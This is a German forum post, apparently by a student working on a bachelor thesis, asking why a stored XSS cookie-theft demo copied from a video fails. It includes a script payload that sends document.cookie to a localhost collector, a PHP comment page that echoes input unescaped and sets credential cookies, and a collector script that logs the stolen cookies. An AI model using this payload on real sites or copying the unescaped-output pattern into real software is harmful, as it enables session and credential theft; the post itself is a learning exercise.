Beiträge von new_user67

Ah, ok werd ich mir merken.

Danke für die schnelle Antwort.

hi,

in diesem video:
https://www.youtube.com/watch?v=OVLz6RgOjIY

wird ein simpler xss angriff gezeigt, nach abtippen des codes funktioniert zwar das eintragen eines normalen kommentars, jedoch nicht das eintragen von:
<script type="text/javascript">
window.location = 'http://localhost/bachelorarbeit/cookies.php?cookies='+document.cookie;
<script>

das eingabefeld für weitere kommentare verschwindet aber die cookies werden nicht auf dem server gespeichert :(+
die eingabe möglichkeit über das post comment field verschwindet weil document.location auf eine andere seite weiterleitet oder?

index.php : dieser teil funktioniert solange man kein <script>... verwendet:

<!DOCTYPE html>
<meta charset="UTF-8">
<title> Comment (XSS)</title>
</head>
<body>




<?php




setcookie("username", "admin", time()+3600);
setcookie("password", "xss", time()+3600);




if($_POST['content']!=null) {
	$fp = fopen('comments.txt', 'a');
	fwrite($fp, $_POST['content'] . "<hr/>");
	fclose($fp);
}




echo nl2br(file_get_contents('comments.txt'));
?>




<h3>Post Comment</h3>
<form action="index.php" method="post">
<textarea name="content" rows="3" color="100"></textarea>
<br/>
<input type="submit" value="Post" />
</form>




</body>
</html>

cookies.php : dieser teil schreibt nicht den inhalt der cookies wie erwartet in die datei cookies.txt
diese sollte am gleichen ort wie die index.php erscheinen?

<?php
$fp = fopen('cookies.txt', 'a');
fwrite($fp, $_GET['cookies'] . "\n\n");
fclose($fp);
?>